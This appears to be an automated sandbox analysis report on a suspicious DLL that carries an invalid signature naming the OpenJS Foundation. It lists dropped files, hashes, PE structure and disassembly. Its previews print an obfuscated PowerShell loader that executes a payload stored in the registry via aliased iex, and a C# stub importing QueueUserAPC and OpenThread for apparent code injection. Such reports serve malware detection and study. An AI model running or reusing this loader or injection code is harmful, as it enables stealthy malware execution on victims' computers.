                        Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.k.l.r.4.j.u.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.k.l.r.4.j.u.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                        C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.0.cs
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):414
                        Entropy (8bit):5.049516587690195
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                        MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                        SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                        SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                        SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                        Malicious:false
                        Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                        C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):371
                        Entropy (8bit):5.28862302275331
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fPt10zxs7+AEszI923fPtdx:p37Lvkmb6KzMWZE2p
                        MD5:FEC723AE4CE1D4A72A48375DAE57F152
                        SHA1:7D0E0234A688710DE2AFE91CBDAA0F7EDC5449C4
                        SHA-256:AF7C1A6DBC10AA5EBB5D72297108D245410FB5FB55D48E3386E4799963732300
                        SHA-512:F018829EA6161344C82F9D46ADA4599BD8C86390DDA4048A59359DB7CC7DDCC052E55B8F893292408EE8D11F5C956A14B79279F119039E799C97D3B6EC77FA6C
                        Malicious:false
                        Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.0.cs"
                        C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):3584
                        Entropy (8bit):2.64310436733059
                        Encrypted:false
                        SSDEEP:24:etGSR8+mUE7R85z7woel/gYp94/eiDPtkZfEPFXmSDZ0WI+ycuZhNoakS0PNnq:6nXE7S5gGYpXiyJmFXm0ZX1uloa3Uq
                        MD5:E78B4F20C9C3ECDFAADE20B23787EBCB
                        SHA1:B89C1EC666680DA7AB129A0F5E9A593625D94201
                        SHA-256:0CF920EAE8AD9733EB1FEAE76CAE748499E334BD5AF3B8E6F0D1940810C3D7F2
                        SHA-512:87CA675464DED2449A4BC6AD61202FA04F00D1AF173D1BF3E471CC5413A85C204EA967C27177FC37A4E80B7E5E31258FA41C0081FF35638F42CC28429D3AC532
                        Malicious:false
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                        C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.out
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):868
                        Entropy (8bit):5.348694375232745
                        Encrypted:false
                        SSDEEP:12:xKIR37Lvkmb6KzMWZE2sKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6Kz9E2sKaM5DqBVKVrdFAMBJTH
                        MD5:D86ACBAA58E203B2849D410C07220578
                        SHA1:22F3A10EF4FB73B6A76D6FA4C6DCC7D8E6842A83
                        SHA-256:9FEC93CFFFF08573DED5958B966582FAC2EB57E68469BF94850C73385625AB86
                        SHA-512:4C56050C5B07C3C13FEFCF808D5E9B28BDC724255406C6A01167949E7E036623E544F32E2B6C16526B4A02BFB52F3DD887F5F362AB856BB5679834C87A68524B
                        Malicious:false
                        Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        C:\Users\user\Documents\20211214\PowerShell_transcript.841675.6dNuCqGT.20211214103418.txt
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1359
                        Entropy (8bit):5.406002359282101
                        Encrypted:false
                        SSDEEP:24:BxSAPzDvBB/x2DOXUWnpLCHm4XWUHjeTKKjX4CIym1ZJXXB/pLCHm4StnxSAZ7t:BZP/v//oOHKm4GUqDYB1Z9B/Km4SRZZR
                        MD5:51B9F4D065CD36EEB47C62B81AFB7F06
                        SHA1:BCFD8E1BD2F58F4F3F3150F672857CF45E23BC2A
                        SHA-256:FAF75023385D35770B9D01F760C1876E1E25445A6D9C839CDAE71091453519F8
                        SHA-512:2BC504F6988648C5FA1DEF96CA3B22A0CC01AD926334F4FB0271D0FA324304F00CF6FBEE76A575C72EFF27D6C4C45BC19DB97E463E175CC38B6793219BD020E6
                        Malicious:false
                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214103419..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841675 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 7012..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214103419..**********************..PS>new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq
                        C:\Users\user\Documents\20211214\PowerShell_transcript.841675.DMr5Wv1u.20211214103418.txt
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1359
                        Entropy (8bit):5.403706904252732
                        Encrypted:false
                        SSDEEP:24:BxSAPzDvBB/x2DOXUWnpLCHm4XWiHjeTKKjX4CIym1ZJXXJpLCHm4StOnxSAZ7iq:BZP/v//oOHKm4GiqDYB1Z9JKm4SaZZ7d
                        MD5:7291ABA011A1193C203450F5D3512461
                        SHA1:310F781764BB9AC8A8D3B7F14E38AD05EE18730C
                        SHA-256:0FA2BD16F02EEC7CA811D01D14782EC171D0A7E6AC1C4439C87B2E6A0C6536C4
                        SHA-512:C2BAB621C1E45A10BEC063ED6F84F63BD94D8533B83FC22A552BA35791A25B0254CF95F3341DC46CE4C6ED63D9698E2114A4A17D3F25BC38B6305B5A257955D9
                        Malicious:false
                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214103420..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841675 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 7160..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214103420..**********************..PS>new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq
                        C:\Users\user\Documents\20211214\PowerShell_transcript.841675.ZSxBE1Sk.20211214103425.txt
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1146
                        Entropy (8bit):5.544628786712
                        Encrypted:false
                        SSDEEP:24:BxSAPJDvBB/x2DOXUWnpLCHm4XW/HjeTKKjX4CIym1ZJXX7pLCHm4v:BZPhv//oOHKm4G/qDYB1Z97Km4v
                        MD5:E0C308808C66AB01D5B3EF7C3856B1D5
                        SHA1:13F36AB3AAEA583989B9C72E15A29F8F49EC8B2A
                        SHA-256:EA41567677F8A22C46060C26ACB8AE2B68B789283782A6096F264A4DBF25468D
                        SHA-512:3EF71D741446DA480EEA5ECDDF428571059A11C2516C8287FA5A891426E1014D9C41649F5D1912D748379F93468DD1C7EB8A9AC14CCD3FFEFBF292E3C707EE4E
                        Malicious:false
                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214103426..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841675 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 3532..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214103426..**********************..PS>new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq
                        C:\Users\user\Documents\20211214\PowerShell_transcript.841675.g3ZPtttJ.20211214103418.txt
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1146
                        Entropy (8bit):5.542879881063877
                        Encrypted:false
                        SSDEEP:24:BxSAPzDvBB/x2DOXUWnpLCHm4XWnHjeTKKjX4CIym1ZJXXB/pLCHm4v:BZP/v//oOHKm4GnqDYB1Z9B/Km4v
                        MD5:635442A47792E7CA6AB6C67E60181544
                        SHA1:1476DE8E879BA1B92742F3F951AECE56DE2A882A
                        SHA-256:C9026B19F44A3E5A20EA9A2F355703C5BC988246CC98D0EE2228333766324050
                        SHA-512:6621F0DB6601D61F5736EB95425F4590ADB546FA422ACC627F4A26544387BA9F274D9A5B13E54DA30228EEBD8EB4DE76CE125A435080D46A6FC5A502FAF2646F
                        Malicious:false
                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214103419..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841675 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 7132..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214103419..**********************..PS>new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq

                        Static File Info

                        General

                        File type:MS-DOS executable, MZ for MS-DOS
                        Entropy (8bit):5.270863171013114
                        TrID:
                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                        • Generic Win/DOS Executable (2004/3) 0.20%
                        • DOS Executable Generic (2002/1) 0.20%
                        • VXD Driver (31/22) 0.00%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:6.dll
                        File size:1781920
                        MD5:ac57d694b86d8532b38d3d62f6de3afc
                        SHA1:c858ec742ba91bf8c139b7bb654ca2d67747c5ef
                        SHA256:fa668d1a58b3b92d9c1b9a740facfaebb35dd723deaf5a3833592208a8a47e5e
                        SHA512:cd9635d667a43c0d6715ec05c114c424b3f1292d7997c8d6c86f937ff81a08262763d33621c7d75d3c2a5fac75b58c71489fe3360fd4a2d6c804e7a72a06683b
                        SSDEEP:49152:JOMo8UQw8MT8UQw8MT8UQw8MT8UQw8MT8UQw8MT8UQw8Mc:xo8UQw8MT8UQw8MT8UQw8MT8UQw8MT8Z
                        File Content Preview:MZ......................................................................!..L.!This .ro.ra. cannot be run in DOS m.de....$.......PE..L...[..a...........!....................................................................................................V..

                        File Icon

                        Icon Hash:82b0f4c6d2c66cb1

                        Static PE Info

                        General

                        Entrypoint:0x1001f3fe
                        Entrypoint Section:.text
                        Digitally signed:true
                        Imagebase:0x10000000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                        DLL Characteristics:
                        Time Stamp:0x61B6D25B [Mon Dec 13 04:55:55 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:90a569c76737ac6eae14ae164dabea89

                        Authenticode Signature

                        Signature Valid:false
                        Signature Issuer:CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                        Signature Validation Error:The digital signature of the object did not verify
                        Error Number:-2146869232
                        Not Before, Not After
                        • 10/1/2020 5:00:00 PM 12/18/2023 4:00:00 AM
                        Subject Chain
                        • CN=OpenJS Foundation, O=OpenJS Foundation, L=San Francisco, S=California, C=US
                        Version:3
                        Thumbprint MD5:8E8056A2284F0304445ED325353454BF
                        Thumbprint SHA-1:E16BB6EE4ED3935C46C356D147E811286BA4BBFE
                        Thumbprint SHA-256:968F9536C18A4475095B37792855AA62306275DEC05BD72F21653C98026CFC4E
                        Serial:038EDB2FC6E405731A760F1516144C85

                        Entrypoint Preview

                        Instruction
                        mov ebx, edi
                        or ebx, edi
                        jmp 00007FD68CC158E2h
                        ret
                        ret
                        pop ecx
                        push esi
                        pop ebx
                        ret
                        mov edi, dword ptr [1000335Ch]
                        call 00007FD68CC147C8h
                        mov esp, dword ptr [ebp-18h]
                        mov word ptr [100030FCh], es
                        mov ecx, dword ptr [ebp-04h]
                        lea ebp, dword ptr [esp+10h]
                        int3
                        int3
                        push ebp
                        push edi
                        mov dword ptr [10003120h], eax
                        push eax
                        je 00007FD68CC144B6h
                        int3
                        mov dword ptr fs:[00000000h], ecx
                        mov eax, dword ptr [ebp+0Ch]
                        mov ecx, edi
                        push eax
                        jmp dword ptr [100040BCh]
                        add ecx, eax
                        mov eax, dword ptr [ecx]
                        cmp edi, ecx
                        mov eax, dword ptr [ecx]
                        push 10000000h
                        mov eax, dword ptr [ebp-14h]
                        push 00000000h
                        push 1001E268h
                        ret
                        xor esi, esi
                        xor esi, esi
                        xor esi, esi
                        pop eax
                        int3
                        int3
                        int3
                        mov esp, dword ptr [ebp-18h]
                        int3
                        jmp dword ptr [10004078h]
                        pop ebx
                        sete cl
                        call 00007FD68CC14373h
                        int3
                        mov ecx, edi
                        ret
                        jmp dword ptr [1000406Ch]
                        ret
                        call 00007FD68CC1407Ch
                        int3
                        int3
                        mov word ptr [100030F8h], fs
                        cmp dword ptr [10003010h], 00000000h
                        int3
                        int3
                        int3
                        call 00007FD68CC1453Fh
                        int3
                        int3
                        mov ebp, esp
                        push dword ptr [ebp+08h]
                        int3
                        sub al, cl
                        jmp 00007FD68CC170D8h
                        int3
                        int3
                        int3
                        push eax
                        mov dword ptr [ebp-04h], eax
                        int3
                        cmp dword ptr [00000000h], 00000000h

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x1cff00x56.text
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x43d040xb4.data
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x16f8e8.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x1b18000x18a0.rsrc
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1b70000x6ec.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x28d060x27c.data
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x26ec00x24800False0.516815603596data5.50396706074IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .data0x280000x1e4fe0x1be00False0.057858043722data6.06796420192IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .rsrc0x470000x16f8e80x16fa00False0.218529518021data4.81717219526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x1b70000x6ec0x800False0.75data6.07315256741IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_ICON0x4af700x668dataEnglishUnited States
                        RT_ICON0x4b5d80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                        RT_ICON0x4b8c00x1e8dataEnglishUnited States
                        RT_ICON0x4baa80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x4bbd00xea8dataEnglishUnited States
                        RT_ICON0x4ca780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                        RT_ICON0x4d3200x6c8dataEnglishUnited States
                        RT_ICON0x4d9e80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x4df500x25a8dataEnglishUnited States
                        RT_ICON0x504f80x10a8dataEnglishUnited States
                        RT_ICON0x515a00x988dataEnglishUnited States
                        RT_ICON0x51f280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x523900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                        RT_ICON0x647b80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                        RT_ICON0x693e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                        RT_ICON0x6d6080x25a8dataEnglishUnited States
                        RT_ICON0x6fbb00x10a8dataEnglishUnited States
                        RT_ICON0x70c580xeb0dataEnglishUnited States
                        RT_ICON0x71b080x988dataEnglishUnited States
                        RT_ICON0x724900x6b8dataEnglishUnited States
                        RT_ICON0x72b480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x72fb00x668dataEnglishUnited States
                        RT_ICON0x736180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                        RT_ICON0x739000x1e8dataEnglishUnited States
                        RT_ICON0x73ae80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x73c100xea8dataEnglishUnited States
                        RT_ICON0x74ab80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                        RT_ICON0x753600x6c8dataEnglishUnited States
                        RT_ICON0x75a280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x75f900x25a8dataEnglishUnited States
                        RT_ICON0x785380x10a8dataEnglishUnited States
                        RT_ICON0x795e00x988dataEnglishUnited States
                        RT_ICON0x79f680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x7a3d00x668dataEnglishUnited States
                        RT_ICON0x7aa380x2e8dataEnglishUnited States
                        RT_ICON0x7ad200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x7ae480xea8dataEnglishUnited States
                        RT_ICON0x7bcf00x8a8dataEnglishUnited States
                        RT_ICON0x7c5980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x7cb000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                        RT_ICON0x810300x25a8dataEnglishUnited States
                        RT_ICON0x835d80x10a8dataEnglishUnited States
                        RT_ICON0x846800x988dataEnglishUnited States
                        RT_ICON0x850080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x854700x668dataEnglishUnited States
                        RT_ICON0x85ad80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                        RT_ICON0x85dc00x1e8dataEnglishUnited States
                        RT_ICON0x85fa80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x860d00xea8dataEnglishUnited States
                        RT_ICON0x86f780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                        RT_ICON0x878200x6c8dataEnglishUnited States
                        RT_ICON0x87ee80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x884500x25a8dataEnglishUnited States
                        RT_ICON0x8a9f80x10a8dataEnglishUnited States
                        RT_ICON0x8baa00x988dataEnglishUnited States
                        RT_ICON0x8c4280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x8c8900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                        RT_ICON0x9ecb80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                        RT_ICON0xa38e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                        RT_ICON0xa7b080x25a8dataEnglishUnited States
                        RT_ICON0xaa0b00x10a8dataEnglishUnited States
                        RT_ICON0xab1580xeb0dataEnglishUnited States
                        RT_ICON0xac0080x988dataEnglishUnited States
                        RT_ICON0xac9900x6b8dataEnglishUnited States
                        RT_ICON0xad0480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0xad4b00x668dataEnglishUnited States
                        RT_ICON0xadb180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                        RT_ICON0xade000x1e8dataEnglishUnited States
                        RT_ICON0xadfe80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0xae1100xea8dataEnglishUnited States
                        RT_ICON0xaefb80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                        RT_ICON0xaf8600x6c8dataEnglishUnited States
                        RT_ICON0xaff280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0xb04900x25a8dataEnglishUnited States
                        RT_ICON0xb2a380x10a8dataEnglishUnited States
                        RT_ICON0xb3ae00x988dataEnglishUnited States
                        RT_ICON0xb44680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0xb48d00x668dataEnglishUnited States
                        RT_ICON0xb4f380x2e8dataEnglishUnited States
                        RT_ICON0xb52200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0xb53480xea8dataEnglishUnited States
                        RT_ICON0xb61f00x8a8dataEnglishUnited States
                        RT_ICON0xb6a980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0xb70000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                        RT_ICON0xbb5300x25a8dataEnglishUnited States
                        RT_ICON0xbdad80x10a8dataEnglishUnited States
                        RT_ICON0xbeb800x988dataEnglishUnited States
                        RT_ICON0xbf5080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0xbf9700x668dataEnglishUnited States
                        RT_ICON0xbffd80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                        RT_ICON0xc02c00x1e8dataEnglishUnited States
                        RT_ICON0xc04a80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0xc05d00xea8dataEnglishUnited States
                        RT_ICON0xc14780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                        RT_ICON0xc1d200x6c8dataEnglishUnited States
                        RT_ICON0xc23e80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0xc29500x25a8dataEnglishUnited States
                        RT_ICON0xc4ef80x10a8dataEnglishUnited States
                        RT_ICON0xc5fa00x988dataEnglishUnited States
                        RT_ICON0xc69280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0xc6d900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                        RT_ICON0xd91b80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                        RT_ICON0xddde00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                        RT_ICON0xe20080x25a8dataEnglishUnited States
                        RT_ICON0xe45b00x10a8dataEnglishUnited States
                        RT_ICON0xe56580xeb0dataEnglishUnited States
                        RT_ICON0xe65080x988dataEnglishUnited States
                        RT_ICON0xe6e900x6b8dataEnglishUnited States
                        RT_ICON0xe75480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
